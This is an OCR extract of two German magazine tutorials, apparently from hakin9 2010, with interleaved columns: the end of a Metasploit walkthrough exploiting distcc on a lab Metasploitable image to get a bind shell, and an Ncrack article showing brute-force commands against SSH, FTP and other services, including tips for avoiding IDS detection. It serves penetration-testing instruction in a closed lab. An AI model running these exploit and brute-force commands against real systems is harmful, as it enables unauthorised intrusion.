für alle unixoiden Systeme und ist auch in der Windows- 200MB große Framework in seiner letzten SVN herun-
Welt dank Cygwin ausführbar. Es existieren drei verschie- tergeladen. Falls noch nicht geschehen, muss noch das
dene Möglichkeiten um mit dem System zu interagieren, aktuelle Ruby on Rails Framework installiert werden.
die msfconsole, msfcli und die msfgui. Wir werden uns sudo gem install -v=2.3.2 rails Danach starten wir die
auf die msfconsole beschränken sie ist -meiner Meinung msfconsole mit: sudo ./msfconsole Es erscheint nach kurzer
nach- die komfortabelste unter allen drei Möglichkeiten. Zeit der Begrüßungsschirm des MSF.
Der große Vorteil an Metasploit ist der modulare Aufbau, Wir sehen hier, dass uns in dieser Version von Me-
es besteht vereinfacht gesagt die Möglichkeit verschiede- tasploit 616 Exploits und 215 Payloads zur Verfügung
ne Payloads über einen Exploit zu bedienen. Anders aus- stehen. Eine immense Zahl, wenn man bedenkt, dass
gedrückt - jedes Modul der MSF-Datenbank ist für sich ei- bei der ersten Ausgabe des Frameworks gerade mal ei-
genständig und hat keine Abhängigkeiten, wenn man mal ne handvoll Exploits zur Verfügung standen.
von den internen Vorschlagslisten absieht.
Anwendung
Vorbereitungen Nun können wir mit dem Kommando msf > help eine Lis-
Wir werden uns für diesen Fall ein Zielsystem suchen, te der zur Verfügung stehenden Befehle erhalten. Für
welches sich innerhalb eines geschlossenen Versuchs- die Anwendung des MSF ist es wichtig zu wissen wel-
netzes befindet. Es ist hilfreich, wenn wir uns den dafür ches Ziel wir verfolgen. Wir wissen ja, dass sich unser
gedachten Metasploitable[2] Images bedienen. Es han- Zielsystem im gleichen Netz befindet, wir führen also ei-
delt sich hier um ein vom Metasploit Projekt bereit gestell- nen Scan aus, um im besten Fall offene Ports vorzufin-

Abbildung 2. Metasploit Begrüßungsschirm

hakin9.org/de 33
TOOLS

den . Dafür wird der in Metasploit integrierte Portscan- vice genutzt wird. Dieser wird normalweise zur Vertei-
ner bemüht. lung von C/C++ Programmen in größeren Netzwerken
und erspart einem so das zeitintensive lokale compilie-
msf > use auxiliary/scanner/portscan/tcp ren auf den jeweiligen Rechnern. Jetzt ist er aber auch
msf auxiliary(tcp) > set RHOSTS 192.168.178.1/24 nützlich für unseren Versuchsaufbau. Nun suchen wir
mittels search distcc welche Exploits für diesen Service
Wir haben also eine IP-Adresse die wir für das weite- in dem Framework vorhanden sind (vgl. Listing 2.).
re Vorgehen nutzen können, außerdem sehen wir eini- Mittels use unix/misc/distcc_exec wählt man das ent-
ge offene TCP-Ports, die leicht als Einfallstor genutzt sprechende Exploit aus.
werden können (vgl. Listing 1.). Jetzt gilt es den richti- Nun ist uns schon einiges über das zu kompromittie-
gen Schlüssel für eines davon zu finden. Wir nehmen rende System bekannt; IP-Adresse, auf welchen Port
uns den Port 3632 vor, der auch von dem DistCC-Ser- der Exploit abzielt und welcher Exploit es sein wird.

Listing 1. TCP Scan mittels auxiliary/scanner/portscan/tcp

[*] 192.168.178.100:22 - TCP OPEN


[*] 192.168.178.100:21 - TCP OPEN
[*] 192.168.178.100:23 - TCP OPEN
[*] 192.168.178.100:25 - TCP OPEN
[*] 192.168.178.100:53 - TCP OPEN
[*] 192.168.178.100:80 - TCP OPEN
[*] 192.168.178.100:139 - TCP OPEN
[*] 192.168.178.100:445 - TCP OPEN
[*] 192.168.178.100:3306 - TCP OPEN
[*] 192.168.178.100:3632 - TCP OPEN
[*] 192.168.178.100:5432 - TCP OPEN
[*] 192.168.178.100:8009 - TCP OPEN
[*] 192.168.178.100:8180 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Listing 2. Suche nach dem entsprechenden Expoit

msf > search distcc


[*] Searching loaded modules for pattern 'distcc'...
Exploits
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution

Listing 3. Anzeige der kompatiblen Payloads

msf exploit(distcc_exec) > show payloads


Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl)
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/generic normal Unix Command, Generic command execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
msf exploit(distcc_exec) > set payload cmd/unix/bind_perl

34 10/2010
Das Metasploit Framework als Unterstützung bei Penetrationstests

Was noch fehlt ist der Payload, der auf den Exploit auf-
Nachteile des Metasploit Frameworks
setzt. Dies kann einfach über den Befehl show payloads
ermittelt werden (vgl. Listing 3.). • leider keine „All-in-One“ Lösung
Anschließend wird per set payload cmd/unix/bind_perl • für Sicherheitsexperten mit entsprechendem KnowHow
der erste Payload für den Exploit gesetzt. nur bedingt empfehlenswert, da nicht immer so aktuell &
umfangreich wie kommerzielle Lösungen
Entsprechend wird auch der Port und die IP-Adresse
• keine Zero-Day-Exploits
des Ziels mittels set eingegeben. Der Befehl show options
zeigt uns die Einstellmöglichkeiten an (vgl. Listing 4.).
Vorteile des Metasploit Frameworks
Listing 4. Setzen des Hosts und der Ports mittelst set
• Sehr viele inkludierte Exploits und Payloads die auf ver-
schiedensten Betriebssystemen anwendbar sind.
msf exploit(distcc_exec) > set RPORTS 3632 • Gute Anpassungsfähigkeit auf eigene Bedürfnisse (an-
msf exploit(distcc_exec) > set passbare Exploits)
RHOST 192.168.178.100 • Plattformunabhängiges Tool, auch für Einsteiger geeignet
msf exploit(distcc_exec) > show • quelloffen
options
• modularer Aufbau

Module options: Soweit sieht alles gut aus, wir können nun mit dem
Aufruf des Exploits beginnen (vgl. Listing 5.).
Name Current Setting Required Description Es wurde nun per remote Bind-Shell die Verbindung
---- --------------- -------- ----------- hergestellt, jetzt besteht die Möglichkeit weitere Root-
RHOST 192.168.178.100 yes The target Rechte zu erlangen. Auf dem Metasploitable Image be-
address findet sich eine Textdatei die verschiedene Schwach-
RPORT 3632 yes The target port stellen des Systems auflistet, hier kann man sich auch
ein paar Anregungen holen.

Payload options (cmd/unix/bind_perl): Resumee


Zusammenfassend lässt sich sagen, dass dieses
Name Current Setting Required Description Framework seit seinem Start im Jahr 2004 immer
---- --------------- -------- ----------- mehr Anhänger findet, was nicht zuletzt auch der of-
LPORT 4444 yes The listen port fenen Struktur zuzuschreiben ist. Gerade auch Ein-
RHOST 192.168.178.100 no The target steigern auf dem Gebiet bietet es viele Möglichkeiten
address ihr Wissen zu erweitern, die Lernkurve ist relativ steil.
Diejenigen die von Berufswegen tagtäglich damit ar-
beiten wissen es zu schätzen und es ist ganz bestimmt
Exploit target: ein funktionales Werkzeug, wenn es darum geht sein
eigenes System und dessen Schwachstellen kennen-
Id Name zulernen. Dies wiederum macht sich zwar nicht sofort
-- ---- bezahlt, zahlt sich aber spätestens dann aus, wenn
0 Automatic Target Not am Mann ist.

Listing 5. Ausführung des Exploits

msf exploit(distcc_exec) > exploit


Im Internet
[*] Started bind handler • [1]http://www.metasploit.com/framework/ Metasploit Fra-
[*] Command shell session 1 opened mework Seite
(192.168.178.104:57052 -> • [2]http://www.metasploit.com/documents/express/Meta-
192.168.178.100:4444) at Wed Oct sploitable.zip.torrent/ - Der offizielle Metasploitable Tor-
27 00:12:13 +0200 2010
rent

ls
4809.jsvc_up ALEXANDER WINKLER
whoami Der Autor ist selbst als Administrator tätig und betreut die
daemon Umsetzung von IT-Sicherheitsrichtlinien in Unternehmen.
Kontakt mit dem Autor unter: mail@swarmstream.de

hakin9.org/de 35
TOOLS

Ncrack – Netzwerkauthentifizierungen
knacken
Christian Stockhorst
Dieser Artikel beschreibt wie mit dem Tool Ncrack
verschiedene Dienste im Netzwerk bzw. die Computer
und andere Geräte im Netzwerk auf denen diese Dienste
laufen auf schwache Passwörter überprüft werden können.
Ncrack bedient sich dabei einem modularem Ansatz, für
verschiedene Services.

IN DIESEM ARTIKEL ERFAHREN SIE... WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...


• wie Sie mit Hilfe von Ncrack BruteForce-Angriffe durchführen • einfach Kenntnisse eines Betriebssystems (Linux, Windows
• wie Sie Einstellungen vornehmen um die BruteForce-Angriffe oder Mac)
• Vorkenntnisse Nmap bzw. Port Scanning Techniken
• Grundkenntnisse im Netzwerk und der eingesetzten Dienste

N
crack ist ein klassisches BruteForce Programm, Es gibt die Herausforderung, neben einer guten
es bietet auf einer modularen Basis verschie- Passwort- und Namensliste ebenfalls über eine Über-
dene Protokollimplementationen an. Es gibt sicht aller Hosts im Netzwerk und deren offenen Ports
Module zur Authentifizierung für FTP, SSH, TELNET, zu verfügen. Hierfür gibt es mehrere Programme, wie
HTTP(S), SMB, RDP und POP3(S). Es sind ebenfalls z.B. NMap, welches schon genannt worden ist und
alle möglichen Optionen und Services als Module im wohl auch der berühmteste Vertreter seiner Art ist.
Quellcode enthalten. Alle benötigten Informationen ge- Mit solch einem Tool lässt sich schnell und gezielt ein
nauso wie eine detailliertere Anleitung findet sich auf gesamtes Netzwerk untersuchen. Außerdem wird die
der NMap – Webseite. Es gibt verschiedene Tools wie Ausgabe in verschiedenen Dateiformaten angeboten,
Ncrack, z.B. THC-Hydra oder JTR, aber im wesentli- so dass direkt mit dem erzielten Ergebnis weiter ge-
chen unterscheiden diese sich nicht wirklich. arbeitet werden kann. Da Nmap und Ncrack sich un-
Bei BruteForce-Angriffen sollte immer beachtet mittelbar kombinieren lassen, wird in diesem Artikel
werden, dass die Fähigkeit das Password zu kna- speziell der Einsatz von Ncrack mit Hilfe von Nmap
cken davon abhängt wie gut die Passwortliste ist aufgezeigt.
und in welcher Art und Weise eine Authentifizierung In den folgenden Abschnitten werden einige Funktio-
stattfindet. Ein Beispiel hierfür wird im Abschnitt des nen bzw. Optionen und Services des Programms erklärt.
SSH-Moduls gegeben, da Ncrack hier einen anderen Unter anderem, wie und in welcher Art anzugreifende
Algorithmus gegenüber anderen Mitspielern, imple- Ziele definiert werden können. Wie spezielle Spezifika-
mentiert hat. tionen für einen Dienst vorgegeben werden. Wie Zeit-
Wenn es darum geht mit BruteForce-Angriffen erfolg- und Performanceoptionen eingestellt werden und wie
reich die Widerstandsfähigkeit von Systemen überprü- eine Authentifizierung durchgeführt werden kann. Da-
fen zu wollen gilt es einige Dinge zu beachten. Wenn wir neben bietet Ncrack die Möglichkeit die Ergebnisse in
von BruteForce Angriffen sprechen, dann beschreiben verschiedenster Art auszugeben, was ebenfalls in ei-
wir eine Methode bei der eine Brechstange angesetzt nem gesondertem Abschnitt vorgestellt wird.
wird oder wir versuchen mit dem Kopf durch die Wand Im letztem Abschnitt werden dann noch mehrere Bei-
zu gehen. Denn eines ist gewiss, die Angriffe erfordern spiele vorgestellt. Diese Beispiele, mit verschiedenen
meistens viel Zeit und erzeugen ein enorm hohes Auf- Spezifikationen und Nutzung verschiedener Module
kommen an Netzwerkverkehr. Umso schwieriger wer- werden ausführlich erklärt. In diesem Abschnitt wird
den die Angriffe, wenn bekannt ist, dass komplexe auch mittels Programm TCPDump veranschaulicht,
Passwörter eingesetzt werden. dass mit einem BruteForce Angriff im Netzwerk sehr

36 11/2010
Ncrack – Netzwerkauthentifizierungen knacken

vorsichtig umgegangen werden muss, denn solch ein Ncrack Optionen


Angriff erzeugt eine Menge Netzwerkverkehr (Geräu- Im folgendem Abschnitt werden alle Optionen und Ser-
sche). vicefunktionen von Ncrack vorgestellt. Es wird jedoch
für diejenigen, welche sich schon ausführlicher mit
Installation von Ncrack NMap beschäftigt haben schnell klar das Ncrack sich
Ncrack ist verfügbar für die Betriebssysteme(BS) Linux, sehr an seinem großem Projektbruder NMap anlehnt,
BSD, Windows und MAC OS X. Eine Installation für die was den Aufruf einiger Parameter angeht.
BS Windows und MAC OS X, ist wirklich sehr einfach Zielspezifikation: Ncrack bietet mehrere Möglichkei-
da hierfür bereits ein Installationspaket vorhanden ist. ten um Adressspezifikationen festzulegen, in diesem
Es gibt aber auch eine Quellcode-Variante, welche auf erstem Abschnitt werden mögliche Zieladressierungen
allen oben genannten System installiert und genutzt vorgestellt.
werden kann. Da Ncrack permanent weiterentwickelt Die einfachste Zielspezifikation die Ncrack anbietet,
wird, steht auch eine SVN – Version zur Verfügung, wel- ist über den Hostnamen oder die IP-Adresse.
che frei zugänglich ist. Als Beispiel, sei folgender Aufruf gegeben: ncrack
Linux: Es wird lediglich die Installation von Ncrack auf 192.168.178.1 oder ncrack testsystem.local.
einem Linuxsystem beschrieben, da die Installationen Es besteht die Möglichkeit Ncrack mehrere Zielspezi-
auf Mac OS X bzw. Windows mit ein bis zwei Maus- fikationen mitzugeben, diese müssen noch nicht einmal
klicks erledigt ist. Aber auch die Installation unter Linux vom selben Typ sein. So wäre folgender Aufruf denk-
ist für jemanden mit ein wenig Erfahrung kein wirkliches bar: ncrack ssh://192.168.178.1 localhost:22.
Hindernis. Denn die Software mit folgenden Befehlen Auch ganze Netzwerkadressbereiche können über
kompiliert und installiert werden. das aus der Linuxwelt bereits bekannte CIDR – Format
Nachdem die Installation ausgeführt wurde kann das angesprochen werden. Ein Aufruf sähe wie folgt aus:
Programm mittels Befehl ncrack aufgerufen werden. Es ncrack ssh://192.168.178.1/24
folgt ein Bildschirm mit allen Einstellungs- und Service- Ziele können dabei nicht nur, über die Kommando-
optionen. zeile angegeben werden, sondern mit den folgenden

Listing 1. Installation unter Linux

//Folgende Befehle sind notwendig um die Software unter Linux zu installieren.

//Um die Datei zu entpacken


tar -xzf ncrack-0.3ALPHA.ta.gz
//Um ins entpackte Verzeichniss zu wechseln
cd ncrack-0.3ALPHA
//Um die Konfigurationsdatei zu erstellen, Verzeichnisse vorzubereiten und Dateien zu kopieren
./configure
//Durchführung der Übersetzung
make
//Benutzerwechsel, Installation nur als Root möglich
su root
//Installation des Programmes
make install

Listing 2. NMap Aufruf für XML Datei

/*Mit folgendem NMap-Befehl kann eine entsprechende XML – Datei erstellt werden , welche in Ncrack aufgerufen
werden kann*/

nmap 192.168.178.1 -oX test.xml

Listing 3. Ncrack Aufruf einer NMap-XML Datei

/*Mit folgendem Ncrack-Befehl kann eine entsprechende Nmap-XML Datei aufgerufen werden.*/

ncrack 192.168.178.1 -iX test.xml

hakin9.org/de 37
TOOLS

Schaltern auch über Dateien eingelesen werden, die Per-Host Dienstspezifikation: Spezifikationen die per-
zuvor z.B. mit NMap erstellt worden sind. In Listing 2 Host festgelegt werden sind direkt an diesen geschrie-
sehen sie daher, wie eine solche Nmap-XML Datei er- ben und somit auch gebunden.
stellt werden kann, im Anschluss daran zeigt Listing 3 Beispiel: ncrack ssh://192.168.178.27 ftp://192.168.
wie die erstellte Datei mit Ncrack aufgerufen werden 178.27 192.168.178:21 192.168.178:22
kann. Globale-Dienstspezifikation: Optionen in diesem Mo-
Häufig ist es so, dass durch Nmap mehr Dienste auf dus beziehen sich auf alle Hosts, unabhängig davon auf
dem Host erkannt werden, als eigentlich durch Ncrack welchen Dienst diese sich beziehen. Die globale Defi-
unterstützt werden. Das hat zur Folge, das die nicht un- nition wird mit dem Schalter -p aktiviert. So können mit-
terstützte Dienste von Ncrack ignoriert werden (vgl. Ab- tels Kommatrennung pro Host oder Ziel mehrere Diens-
bildung 1.). te mit entsprechenden Ports festgelegt werden:
Beispiel: ncrack 192.168.178.27 -p 22,ftp:3300,telnet,
Dienstspezifikation: pop:56
Um Ncrack nutzten zu können muss mindestens ein Im Normalfall reicht hier die Spezifikation des Ports
Ziel und ein entsprechender Dienst beim Aufruf ange- oder des Dienstes, da Ncrack diesen zuordnen kann.
geben werden. Dabei kann die Dienstspezifikation über Für entsprechend abweichende Dienste von Standard-
den entsprechenden Port oder den Namen des Diens- ports, muss beides definiert werden, siehe im obigen
tes definiert werden. Eine Ausnahme bildet jedoch, ein Beispiel die Dienste ftp und pop.
Dienst der auf einem ihm fremden Port angesiedelt ist.
Hier muss beim Aufruf, der Dienst und der Port angege- Dienstoptionen:
ben werden, siehe Beispiel. Dienstoptionen können genau wie die eben be-
Ncrack bietet für die oben genannten Möglichkeiten schrieben Dienstspezifikationen auf verschiedene
die Per-Host bzw. Global Spezifikation an. Gruppen angewendet werden. Unter anderem auf

Listing 4. Beispiel 1

/*Ein erstes einfaches Beispiel mit ssh*/


ncrack 192.168.178.27:22 - -user root,admin,administrator - -pass 123.Admin,passwort,PASSWORT,Passwort1+

/*Identisches Beispiel wie oben, mit anderer Dienstdefinition*/


ncrack ssh://192.168.178.27 - -user root,admin,administrator - -pass 123.Admin,passwort,PASSWORT,Passwort1+

Abbildung 1. Ncrack ignoriert unbekannte Dienste

Abbildung 2. Erfolgreiche Authehtifizierung

38 11/2010
Ncrack – Netzwerkauthentifizierungen knacken

einen einzelnen Host, auf bestimmte Module bzw. Connection Limit: cl <num-minconnections>; CL <num-
Dienste, oder auf eine globale Definition. Durch maxconnections>
Dienstoptionen werden dabei die Timing- und Per- Hiermit wird statisch festgelegt wie viele Verbindungen
formanceeinstellungen festgelegt, diese werden gleichzeitig geöffnet werden. Denn normalerweise arbei-
im folge Abschnitt besprochen. Die verschiedenen tet Ncrack dynamisch, dabei wird die Anzahl von Verbin-
Optionen können in einer großen Vielfalt festgelegt dungen für jedes anzugreifende Ziel anhand von verwor-
werden, dabei gibt es jedoch eine strikte Hierarchie fenen Paketen bzw. Verbindungsfehlern festgelegt.
zu berücksichtigen. Der Nutzen dieser Einstellung ist gerade dann gut
Per-Host Optionen: Wie im vorherigem Abschnitt geeignet wenn bekannt ist, dass die Ziele bei denen
schon beschrieben, definieren auch hier die Per- Authentifizierungsversuche durchgeführt werden kei-
Host Optionen spezielle Parameter für ein einzelnes ne simultanen Verbindungen zulassen. Aber diese Pa-
Ziel. rameter sind auch mit Vorsicht zu gebrauchen, denn
Beispiel: ncrack ssh://192.168.178.27:22,cl=1,CL=2 durch einen zu hohen Wert kann es passieren das
Per-Modul Optionen: Optionen die pro Modul festge- Firewall- oder IDS-Systeme einen DoS Angriff dahinter
legt werden beziehen sich auf, alle in einem Aufruf be- vermuten und die entsprechende IP – Adresse aus dem
stehenden Instanzen dieses Moduls (Dienstes). Aufge- Netz verbannen.
rufen wird die Optionen mit dem Parameter -m . Auf der anderen Seite kann gerade durch den ge-
Beispiel: ncrack ssh://192.168.178.1/24 -m ssh: schickten Nutzen einer Verbindungsobergrenze dafür
cl=1,CL=2,at=2,cd=300ms gesorgt werden, dass der eigene Computer im Netz-
Globale Optionen: Optionen die global festgelegt wer- werk möglichst unentdeckt bleibt, sich quasi unsichtbar
den, gelten für alle Ziele und alle Dienste. Der Aufruf im Netzwerk aufhält. Was aber wiederum einen enor-
dieser Optionen wird mit dem Parameter -g initiiert. men Nachteil der Geschwindigkeit bei den Authentifizie-
Beispiel: ncrack 192.168.178.1/24:22 192.168.178. rungsversuchen nach sich zieht.
1/24:80 -g cl=1,CL=3,at=2,cd=300 -m ssh:cl=1,CL=2
Zeit- und Performanceeinstellungen: Diese Grup- Authentication Tries: at <num-attempts>
pe der Optionen ist die wichtigste die ein vernünftiges
Netzwerk-Authentifizierungs Tool ausmachen. Um eine Mit Hilfe dieses Parameters kann festgelegt werden,
größtmögliche Präzision zu erhalten ohne das weiterer wie viele Authentifizierungs-Versuche pro Verbindung
Benutzereingriffe notwendig sind, müssen diese Optio- vorgenommen werden. Viele Dienste haben eine obe-
nen viele Möglichkeiten mit diversen Einstellungen bie- re Grenze was die Anzahl der Versuche pro Verbin-
ten. dung angeht.
Einige der kommenden Parameter akzeptieren ei- Wenn der Wert auf eine zu hohe Anzahl gesetzt wird,
nen Zeitparameter. Dieser kann in Millisekunden, Se- dann wird daraus kein wirklicher Mehrwert gezogen.
kunden, Minuten und Stunden angeben werden. Im Ab- Denn sobald Ncrack realisiert, dass die angegebene
schnitt Beispiel wird solch ein Beispiel mit festgelegtem Zahl der Authentifizierungsversuche nicht erreicht wer-
Zeitparameter vorgestellt. den kann, wird die übergebene Einstellung ignoriert.

Abbildung 3. Statusausgabe Ncrack

Abbildung 4. Ncrack Netzwerkverkehr

hakin9.org/de 39
TOOLS

Connection Delay: cd <time> Authentifizierung:


In diesem Abschnitt werden die verschiedenen Para-
Einstellen einer Verzögerung zwischen den einzelnen meter beschrieben, die genutzt werden um Benutzer-
Verbindungen eines Authentifizierungs-Versuches. namens- und Passwortlisten übergeben zu können.
Im Standard versucht Ncrack so schnell wie möglich
neue Verbindungen zu initiieren, dies aber auch nur • Hinweis: Ncrack liefert im Verzeichnis /usr/local/
wenn kein Connection Limit eingestellt ist. Die Opti- share/ncrack einige vordefinierte Listen für Pass-
on benötigt eine der oben bereits genannten Zeitpa- wörter und Benutzernamen.
rameter. • Benutzerliste-Datei: -U <Dateiname>
• Passwortliste-Datei: -P <Dateiname>
Timeout: to <time> • Benutzernamen: - - user <username_liste>
• Passwortliste: - - pass <passwort_liste>
Durch diese Option wird festgelegt wie viel Zeit Ncrack • Umkehren der Listeniteration: - - passwords-first
aufbringt um einen Dienst zu knacken. Danach stoppt
das Programm, unabhängig davon ob es gültige An- Ein Beispiel für den Aufruf solcher Listen befindet sich
meldedaten gefunden hat oder nicht. im Abschnitt Beispiele.

Timing template: -T paranoid / sneaky / polite / normal Ausgabe:


/ aggressive / insane Vieles was an Daten erzeugt wird, muss zu Zwecken
der Dokumentation, oder alleine um eine vernünfti-
Diese Einstellungen, sind den Lesern die bereits Er- ge Übersicht zu erhalten dementsprechend vom Pro-
fahrung mit Nmap haben sehr wahrscheinlich bekannt. gramm ausgegeben oder dargestellt werden. An dieser
Es geht hier um Templates, welche ein Gesamtge- Stelle, werden durch Ncrack mehrere Möglichkeiten ge-
rüst aus den oben im einzelnen beschriebenen Para- boten damit auch fast jeder Benutzer auf seine Kosten
metern bilden. Angefangen bei paranoid welches eine kommt.
Vorlage darstellt mit wenigen Verbindungen und ho- Ncrack bietet drei verschiedene Ausgabemög-
hen Timeouts, bis hin zu insane welches ein Maximum lichkeiten an. Das erste hier vorgestellte Ausgabe-
an Verbindungen und ein Minimum an Timeouts reprä- format ist der interactive output, welcher über das
sentiert. Standardoutput(stdout) des Betriebssystems gesendet

Listing 5. Beispiel 2

/*Ein Beispiel für einen Netzwerkbereich und mehreren Diensten mit ftp und ssh*/
ncrack 192.168.178.1/24 -p ftp:21,ssh:22 - -user root,admin,administrator - -pass 123.Admin,passwort,PASSWORT,Pa
sswort1+

Listing 6. Beispiel 3

/*Ein Beispiel für einen Netzwerkbereich und mehreren Diensten und Passwortlisten*/
ncrack 192.168.178.1/24:22 192.168.178.1/24:80 –iX sample.xml -U usernames.txt -P passwortliste.txt

Listing 7. Beispiel 4

/*Ein Beispiel für einen Netzwerkbereich und mehreren Diensten, Passwortlisten und Moduloptionen*/
ncrack 192.168.178.1/24:22 192.168.178.1/24:80 -m ssh:cl=1,CL=2 –iX sample.xml -U usernames.txt -P
passwortliste.txt

Listing 8. Beispiel 5

/*Ein Beispiel für einen Netzwerkbereich und mehreren Diensten, Passwortlisten, Moduloptionen und globalen
Einstellungen*/
ncrack 192.168.178.1/24:22 192.168.178.1/24:80 -g cl=1,CL=3,at=2,cd=300 -m ssh:cl=1,CL=2 –iX sample.xml -U
usernames.txt -P passwortliste.txt

40 11/2010
Ncrack – Netzwerkauthentifizierungen knacken

wird. Daneben gibt es dann noch den normal output, gen zu beachten. Daher geht Ncrack bei der Iteration
welcher dem interactive output identisch ist. Die Unter- von Passwort und Benutzerlisten bei SSH etwas anders
schiede zeigen sich in der Ausgabe von Laufzeitinfor- vor als die meisten anderen Programme. Grund hier-
mationen und Warnungen. für ist, dass SSH während einer bestehenden Verbin-
Die dritte Ausgabemöglichkeit ist XML, was heutzu- dungsauthentifikation keine Änderung des Anmeldena-
tage eines der wichtigsten Ausgabetypen ist. Es kann mens zulässt.
sehr schnell in HTML konvertiert werden, um es gra- Ncrack nutzt einen speziellen Algorithmus, welcher
fisch anzeigen zu können. Auch ein Import in Datenban- den Anmeldenamen einer bestehenden Verbindung
ken kann durch dieses Format ohne größere Probleme mit Passwörtern versorgt. Ncrack öffnet als eine Ver-
bewerkstelligt werden. bindung und übergibt soviele Passwörter an einen be-
Ausgabeformate: Die mögliche Ausgabe kann anhand stimmten Anmeldenamen wie Versuche vom Server zu-
dreier Parameter gestaltet werden, welche zwei ver- gelassen werden.
schiedene Dateitypen erzeugen. So kann entweder eine HTTP(S): Im HTTP-Modul wird bis jetzt lediglich die
Textdatei oder eine Xml – Datei als Ausgabeformat ge- BASIS - Authentifikation unterstützt. Ncrack's HTTP-
wählt werden. Der dritte Parameter erlaubt nur noch ei- Module versucht mit dem Keep-Alive Flag zu arbeiten.
ne Ausgabe beider Dateitypen. Die Möglichen Parame- Denn dieses führt zu einer erhöten Geschwindigkeit weil
ter sind: -oN<filespec> ; -oX<filespec> ; -oA<basename>. dutzende von Versuchen pro Verbindung unternommen
Verschiedenes (Miscellaneous Options): Hierunter fal- werden können. Das HTTP – Modul kann auch über
len einige wichtige und nicht so wichtige Optionen die in SSL genutzt werden.
Ncrack eingeschaltet werden können. Drei Optionsmög- SMB: Das SMB – Modul arbeitet über Raw-TCP, Net-
lichkeiten sollten an dieser Stelle jedoch erklärt werden, BIOS ist zum jetzigem Standpunkt noch nicht imple-
da diese die Arbeit mit Ncrack erleichtern können. mentiert. Einen Vorteil, den dieses Protokoll bietet ist
- -resume <file> : Mit dieser Option besteht die Mög- die hohe Parallelisierung, so dass Benutzer die Anzahl
lichkeit eine zuvor durch den Benutzer abgebrochene an gleichzeitigen Proben gegenüber SMB hoch halten
Sitzung wieder aufzunehmen. Eine Datei welche aus können.
einem Abbruch erzeugt wurde, befindet sich im Home- RDP: Ist ein von Microsoft entwickeltest Protokoll zur
Verzeichniss des Benutzers unter .ncrack, die Datei Übertragung von grafischen Terminalsessions vom Re-
weißt dabei das Format: restore.YY-MM-DD_hh-mm mote-Computer zum Client.
auf. RDP ist eines der Protokolle welche den komplexes-
-6: Diese Option aktiviert IPv6, was zur Folge hat ten Aufbau hat, es wird ein Austausch vieler Pakete für
das anstelle von Hostnamen nun ausschließlich Ipv6- die Authehtifizierungsphase vorausgesetzt. Daher ist
Adressen akzeptiert werden. Alles andere wie z.B. die dieses Modul auch das langsamste aller hier vorgestell-
Ausgabe bleibt jedoch gleich. ten Module, dementsprechend benötigt das knacken
von Passwörtern viel Zeit.
Ncrack Module Vorsicht: Sobald es sich um einen RDP Server auf
FTP: FTP ist eines der schnellsten Module, Grund hier- Basis von Windows XP handelt, ist vorsichtig damit um-
für ist unter anderem der geringe Protokoll-Overhead. zugehen. Denn diese können nicht mehrere Verbindun-
Außerdem erlauben die meisten FTP-Dienste 3 bis 6 gen zur selben Zeit aushandeln. Daher ist es ratsam
gleichzeitige Verbindungen, mit dem Ergebnis eines ein sehr langsames timing template oder noch besser
fehlgeschlagenen Anmeldungsversuch. Ein bekanntes die maximale Anzahl an parallelen Verbindungen zu be-
Beispiel hierfür, ist FileZilla bei dem die Verzögerung so schränken, mit der timing option CL (Connection Limit)
groß ist, dass es praktisch einfacher ist, mehrere Ver- oder cd (connection delay).
bindungen gleichzeitig zu öffnen mit jeweils einer Au- POP3(S): Leider lässt sich zu diesem Modul noch
thentifikation. nicht so viel sagen, da es noch in einer experimentalen
TELNET: Telnet ist zwar schon seit längerem durch Phase ist. Jedoch kann es schon vollständig, wie die
seinen Gegenspieler SSH ersetzt worden, jedoch fin- anderen Module auch, eingesetzt werden.
det es immer noch häufigen Einsatz im Bereich von
Routern und Netzwerkdrucken welche einen Fernwar- Ncrack Beispiel
tungszugang haben. Normalerweise ist deren Authen- In den unten aufgezeigten Beispielen, werden alle Auf-
tifizierung auch recht einfach zu knacken, da meistens rufe in einer virtuellen Netzwerkumgebung aufgerufen.
Standardpasswörter benutzt werden welche der Öf- Dabei ist stets der virtuelle Client mit der Ip-Adresse
fentlichkeit bekannt sind. Einen erheblichen Nachteil 192.168.178.27 das Angriffsziel. Hierbei handelt es sich
hat TELNET an sich, die Authentifizierung, welche sehr um das Betriebssystem Debian 5.0 mit einem installier-
langsam. ten OpenSSH-Server.
SSH: Um Bruteforce-Angriffe gegen SSH durchfüh- In dieser Testumgebung wird stets zu Demonstrati-
ren zu können sind einige Hürden und Herausforderun- onszwecken der Benutzer: root mit dem Passwort: 123.

hakin9.org/de 41
TOOLS

Admin verwendet. Da es sich hierbei um einen Account Firewalls oder Ids-Systeme im Netzwerk vorhanden
handelt der in allen vorgestellten Diensten Verwendung sind. Solle die Konfiguration und Durchführung von
findet. Eine erfolgreich durchgeführte Authentifizierung Ncrack mit bedacht durchgeführt werden. Denn schnell
erscheint wie in Abbildung 2 dargestellt. erkennen diese Systeme zu viele Authentifizierungsver-
Beide oben aufgeführten Befehle bewirken den glei- suche von einem Client an einem Dienst als einen DoS-
chen Vorgang, jeweils in einer anderen Schreibweise. Angriff. Auf der anderen Seite, führt dies jedoch auch zu
In Abbildung 4 ist dargestellt welcher Netzwerkver- erheblichen Performanceverlusten, da nur noch wenige
kehr bei einer Authetifizierung, hier gegen SSH, auf- Verbindungen mit hohen Timeouts durchgeführt werden
kommt. können.
Es sollten auch im Normalfall nicht ganze Netzwerk-
Interaktionen zur Laufzeit bereiche angegeben werden, da der zu prüfende Raum
Während der Ncrack Ausführung, ist eine Interaktion mit zu groß wird. Ziele sollten ganz gezielt ausgesucht wer-
dem Programm möglich. Denn alle Tasten die gedrückt den, da so eine zeitliche Prüfung möglich ist. Es sollte
werden, werden vom Programm abgefangen umso mit auch auf z.B. Arbeitszeiten der User geachtet werden,
diesem zu interagieren ohne es abbrechen oder neu- versuchen Sie Zeiten zu finden in denen die User arbei-
